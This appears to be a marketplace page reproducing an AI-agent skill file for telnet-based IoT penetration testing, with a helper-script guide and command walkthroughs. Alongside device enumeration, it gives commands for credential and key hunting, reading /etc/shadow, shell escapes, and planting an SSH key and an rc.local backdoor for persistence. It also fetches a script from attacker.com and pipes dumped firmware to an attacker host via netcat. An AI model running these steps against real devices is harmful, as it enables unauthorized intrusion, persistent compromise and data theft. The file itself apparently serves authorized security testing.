Ideal for Security Testing Agents requiring advanced IoT device interaction via telnet for penetration testing operations IoT HackBot: A collection of Claude Skills and custom tooling for hybrid IoT pentesting

How do I install telnetshell?

Run the command: npx killer-skills add BrownFineSecurity/iothackbot/telnetshell. It works with Cursor, Windsurf, VS Code, Claude Code, and 19+ other IDEs.

What are the use cases for telnetshell?

Key use cases include: Enumerating IoT devices, Conducting weak authentication testing, Performing post-exploitation activities on compromised devices.

Which IDEs are compatible with telnetshell?

This skill is compatible with Cursor, Windsurf, VS Code, Trae, Claude Code, OpenClaw, Aider, Codex, OpenCode, Goose, Cline, Roo Code, Kiro, Augment Code, Continue, GitHub Copilot, Sourcegraph Cody, and Amazon Q Developer. Use the Killer-Skills CLI for universal one-command installation.

Are there any limitations for telnetshell?

Requires Python 3 with pexpect library. Needs telnet client installed on the system. Depends on network access to the target device.

IoT Telnet Shell (telnetshell)

Name: telnetshell
Availability: InStock
Author: BrownFineSecurity

This skill enables interaction with IoT device shells accessible via telnet for security testing and penetration testing operations. It supports unauthenticated shells, weak authentication testing, device enumeration, and post-exploitation activities.

Prerequisites

Python 3 with pexpect library (pip install pexpect or sudo pacman -S python-pexpect)
telnet client installed on the system (sudo pacman -S inetutils on Arch)
Network access to the target device's telnet port

Recommended Approach: Telnet Helper Script

IMPORTANT: This skill includes a Python helper script (telnet_helper.py) that provides a clean, reliable interface for telnet communication. This is the RECOMMENDED method for interacting with IoT devices.

Default Session Logging

ALL commands run by Claude will be logged to /tmp/telnet_session.log by default.

To observe what Claude is doing in real-time:

bash
1# In a separate terminal, run:
2tail -f /tmp/telnet_session.log

This allows you to watch all telnet I/O as it happens without interfering with the connection.

Why Use the Telnet Helper?

The helper script solves many problems with direct telnet usage:

Clean output: Automatically removes command echoes, prompts, and ANSI codes
Prompt detection: Automatically detects and waits for device prompts
Timeout handling: Proper timeout management with no arbitrary sleeps
Easy scripting: Simple command-line interface for single commands or batch operations
Session logging: All I/O logged to /tmp/telnet_session.log for observation
Reliable: No issues with TTY requirements or background processes
JSON output: For programmatic parsing and tool chaining

Quick Start with Telnet Helper

Single Command:

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"

Custom Port:

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"

With Custom Prompt (recommended for known devices):

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --prompt "^/ [#\$]" --command "ifconfig"

Interactive Mode:

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive

Batch Commands from File:

bash
1# Create a file with commands (one per line)
2echo -e "uname -a\ncat /proc/version\nifconfig\nps" > commands.txt
3python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --script commands.txt

JSON Output (for parsing):

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a" --json

Debug Mode:

bash
1python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "ls" --debug

Session Logging (for observation):

bash
1# Terminal 1 - Run with logging
2python3 .claude/skills/telnetshell/telnet_helper.py \
3  --host 192.168.1.100 \
4  --port 2222 \
5  --logfile /tmp/session.log \
6  --interactive
7
8# Terminal 2 - Watch the session in real-time
9tail -f /tmp/session.log

Note: See OBSERVING_SESSIONS.md for comprehensive guide on monitoring telnet sessions.

Telnet Helper Options

Required (one of):
  --command, -c CMD         Execute single command
  --interactive, -i         Enter interactive mode
  --script, -s FILE         Execute commands from file

Connection Options:
  --host, -H HOST           Target host IP or hostname (required)
  --port, -P PORT           Telnet port (default: 23)
  --timeout, -t SECONDS     Command timeout (default: 3.0)
  --prompt, -p PATTERN      Custom prompt regex pattern

Output Options:
  --raw, -r                 Don't clean output (show echoes, prompts)
  --json, -j                Output in JSON format
  --logfile, -l FILE        Log all I/O to file (default: /tmp/telnet_session.log)
  --debug                   Show debug information

Common Prompt Patterns

The helper script includes common prompt patterns, but you can specify custom ones:

bash
1# BusyBox shell (common on IoT)
2--prompt "/\s*[#\$]\s*$"
3
4# Standard root/user prompts
5--prompt "^[#\$]\s*$"
6
7# Custom device
8--prompt "^MyDevice>\s*$"
9
10# Uniview cameras
11--prompt "^User@[^>]+>\s*$"

Device Enumeration Example with Telnet Helper

Here's a complete example of safely enumerating a device:

bash
1# Set variables for convenience
2HELPER="python3 .claude/skills/telnetshell/telnet_helper.py"
3HOST="192.168.1.100"
4PORT="2222"
5LOGFILE="/tmp/telnet_session.log"
6
7# System information
8$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "uname -a"
9$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/version"
10$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /proc/cpuinfo"
11
12# Check for BusyBox
13$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "busybox"
14
15# Network configuration
16$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ifconfig"
17$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "route -n"
18$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "netstat -tulpn"
19
20# Process listing (may need longer timeout)
21$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --timeout 5 --command "ps aux"
22
23# File system exploration
24$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "ls -la /"
25$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "mount"
26$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "df -h"
27
28# Security assessment
29$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "cat /etc/passwd"
30$HELPER --host $HOST --port $PORT --logfile "$LOGFILE" --command "find / -perm -4000 2>/dev/null"

IMPORTANT FOR CLAUDE CODE: When using this skill, ALWAYS include --logfile /tmp/telnet_session.log in every command so the user can monitor activity with tail -f /tmp/telnet_session.log.

Instructions

1. Connection Setup

Default connection:

Port: 23 (standard telnet, override with --port)
Timeout: 3 seconds (override with --timeout)
Logging: /tmp/telnet_session.log by default

Common telnet ports on IoT devices:

23: Standard telnet port
2222: Alternative telnet port (common on cameras)
8023: Alternative telnet port
Custom ports: Check device documentation or nmap scan results

2. BusyBox Shells (Most IoT Devices)

IMPORTANT: The vast majority of IoT devices use BusyBox, a lightweight suite of Unix utilities designed for embedded systems. BusyBox provides a minimal shell environment with limited command functionality.

Identifying BusyBox:

bash
1# Check what shell you're using
2busybox
3busybox --help
4
5# Or check symlinks
6ls -la /bin/sh
7# Often shows: /bin/sh -> /bin/busybox
8
9# List available BusyBox applets
10busybox --list

BusyBox Limitations:

Many standard Linux commands may be simplified versions
Some common flags/options may not be available
Features like tab completion may be limited or absent
Some exploitation techniques that work on full Linux may not work

Common BusyBox commands available:

bash
1# Core utilities (usually available)
2cat, ls, cd, pwd, echo, cp, mv, rm, mkdir, chmod, chown
3ps, kill, top, free, df, mount, umount
4grep, find, sed, awk (limited versions)
5ifconfig, route, ping, netstat, telnet
6vi (basic text editor - no syntax highlighting)
7
8# Check what's available
9busybox --list | sort
10ls /bin /sbin /usr/bin /usr/sbin

BusyBox-specific considerations for pentesting:

ps output format may differ from standard Linux
Some privilege escalation techniques require commands not in BusyBox
File permissions still work the same (SUID, sticky bits, etc.)
Networking tools are often present (telnet, wget, nc/netcat, ftpget)
Python/Perl/Ruby are usually NOT available (device storage constraints)

Useful BusyBox commands for enumeration:

bash
1# Check BusyBox version (may have known vulnerabilities)
2busybox | head -1
3
4# Network utilities often available
5nc -l -p 4444  # Netcat listener
6wget http://attacker.com/shell.sh
7ftpget server file
8telnet 192.168.1.1
9
10# httpd (web server) often included
11busybox httpd -p 8080 -h /tmp  # Quick file sharing

3. Device Enumeration

Once you have shell access, gather the following information:

System Information:

bash
1# Kernel and system info
2uname -a
3cat /proc/version
4cat /proc/cpuinfo
5cat /proc/meminfo
6
7# Distribution/firmware info
8cat /etc/issue
9cat /etc/*release*
10cat /etc/*version*
11
12# Hostname and network
13hostname
14cat /etc/hostname
15ifconfig -a
16cat /etc/network/interfaces
17cat /etc/resolv.conf
18
19# Mounted filesystems
20mount
21cat /proc/mounts
22df -h
23
24# Running processes
25ps aux
26ps -ef
27top -b -n 1

User and Permission Information:

bash
1# Current user context
2id
3whoami
4groups
5
6# User accounts
7cat /etc/passwd
8cat /etc/shadow  # If readable - major security issue!
9cat /etc/group
10
11# Sudo/privilege info
12sudo -l
13cat /etc/sudoers

Network Services:

bash
1# Listening services
2netstat -tulpn
3lsof -i
4
5# Firewall rules
6iptables -L -n -v
7cat /etc/iptables/*

Interesting Files and Directories:

bash
1# Configuration files
2ls -la /etc/
3find /etc/ -type f -readable
4
5# Web server configs
6ls -la /etc/nginx/
7ls -la /etc/apache2/
8ls -la /var/www/
9
10# Credentials and keys
11find / -name "*.pem" 2>/dev/null
12find / -name "*.key" 2>/dev/null
13find / -name "*password*" 2>/dev/null
14find / -name "*credential*" 2>/dev/null
15grep -r "password" /etc/ 2>/dev/null
16
17# SUID/SGID binaries (privilege escalation vectors)
18find / -perm -4000 -type f 2>/dev/null
19find / -perm -2000 -type f 2>/dev/null
20
21# World-writable files/directories
22find / -perm -2 -type f 2>/dev/null
23find / -perm -2 -type d 2>/dev/null
24
25# Development/debugging tools
26which gdb gcc python perl ruby tcpdump
27ls /usr/bin/ /bin/ /sbin/ /usr/sbin/

4. Privilege Escalation (if not root)

Check for common vulnerabilities:

bash
1# Kernel exploits
2uname -r  # Check kernel version for known exploits
3
4# Check for exploitable services
5ps aux | grep root
6
7# Writable service files
8find /etc/init.d/ -writable 2>/dev/null
9
10# Cron jobs
11crontab -l
12ls -la /etc/cron*
13cat /etc/crontab

5. Persistence and Further Access

Establish additional access methods:

bash
1# Add SSH access (if SSH is available)
2mkdir -p /root/.ssh
3echo "your_ssh_public_key" >> /root/.ssh/authorized_keys
4chmod 600 /root/.ssh/authorized_keys
5chmod 700 /root/.ssh
6
7# Start SSH service (if not running)
8/etc/init.d/ssh start
9# or
10/etc/init.d/sshd start
11# or
12/etc/init.d/dropbear start  # Common on embedded devices
13
14# Add to startup scripts
15echo "/path/to/backdoor &" >> /etc/rc.local

6. Firmware Extraction

Extract firmware for offline analysis:

bash
1# Find MTD partitions (common on embedded devices)
2cat /proc/mtd
3cat /proc/partitions
4
5# Dump flash partitions
6dd if=/dev/mtd0 of=/tmp/bootloader.bin
7dd if=/dev/mtd1 of=/tmp/kernel.bin
8dd if=/dev/mtd2 of=/tmp/rootfs.bin
9
10# Copy to external storage or network
11# If network is available:
12nc attacker_ip 4444 < /tmp/rootfs.bin
13
14# If HTTP server is available:
15cd /tmp
16busybox httpd -p 8000
17# Then download from http://device_ip:8000/rootfs.bin

Common IoT Device Scenarios

Scenario 1: No Authentication Shell

bash
1# Connect - drops directly to root shell
2python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive
3# Enumerate and exploit

Scenario 2: Custom Port No-Auth Shell

bash
1# Many IoT cameras use port 2222
2python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive

Scenario 3: Password-Protected Shell

bash
1# If you encounter a password prompt, the helper will detect it
2# Try default credentials:
3# - root/root
4# - admin/admin
5# - root/(empty)
6# Search online for device-specific defaults

Scenario 4: Limited Shell Escape

bash
1# If you get a limited shell:
2# Try common escape techniques:
3echo $SHELL
4/bin/sh
5/bin/bash
6vi  # Then :!/bin/sh
7less /etc/passwd  # Then !/bin/sh
8find / -exec /bin/sh \;
9awk 'BEGIN {system("/bin/sh")}'

Security Testing Checklist

Best Practices

Always log your session: Default logfile is /tmp/telnet_session.log
Document everything: Take notes on commands, responses, and findings
Use batch scripts: Create enumeration scripts for common tasks
Research the device: Look up known vulnerabilities, default credentials, and common issues
Use proper authorization: Only perform pentesting on devices you own or have explicit permission to test
Be careful with destructive commands: Avoid commands that could brick devices or corrupt data
Monitor your session: Use tail -f in another terminal to watch activity

Troubleshooting

Problem: Connection refused

Solution: Check if telnet service is running, verify port number, check firewall rules

Problem: Connection timeout

Solution: Verify network connectivity, check if device is powered on, verify IP address

Problem: "Permission denied"

Solution: Telnet service may require authentication, try default credentials

Problem: Commands not echoing

Solution: Use --raw flag to see unfiltered output

Problem: Garbled output or wrong prompt detection

Solution: Use --prompt flag with custom regex pattern for your specific device

Pre-built Enumeration Scripts

The skill includes pre-built enumeration scripts for common tasks:

enum_system.txt: System information gathering
enum_network.txt: Network configuration enumeration
enum_files.txt: File system exploration
enum_security.txt: Security-focused enumeration

Usage:

bash
1python3 .claude/skills/telnetshell/telnet_helper.py \
2  --host 192.168.1.100 \
3  --port 2222 \
4  --script .claude/skills/telnetshell/enum_system.txt

Example Usage

bash
1# Basic connection to standard telnet port
2python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command "uname -a"
3
4# Connection to custom port (common for IoT cameras)
5python3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command "ls /"
6
7# Interactive session with logging
8python3 .claude/skills/telnetshell/telnet_helper.py \
9  --host 192.168.1.100 \
10  --port 2222 \
11  --logfile /tmp/camera_session.log \
12  --interactive
13
14# Batch enumeration
15python3 .claude/skills/telnetshell/telnet_helper.py \
16  --host 192.168.1.100 \
17  --port 2222 \
18  --script enum_system.txt \
19  --json > results.json
20
21# Long-running command with custom timeout
22python3 .claude/skills/telnetshell/telnet_helper.py \
23  --host 192.168.1.100 \
24  --timeout 10 \
25  --command "find / -name '*.conf'"

References

BusyBox Official Site
BusyBox Command List
IoT pentesting resources and vulnerability databases
Device-specific documentation and datasheets

telnetshell — community telnetshell, iothackbot, community, ide skills, Claude Code, Cursor, Windsurf

About this Skill

Agent Capability Analysis

Ideal Agent Persona

Core Value

↓ Capabilities Granted for telnetshell

! Prerequisites & Limits

Browser Sandbox Environment

⚡️ Ready to unleash?

telnetshell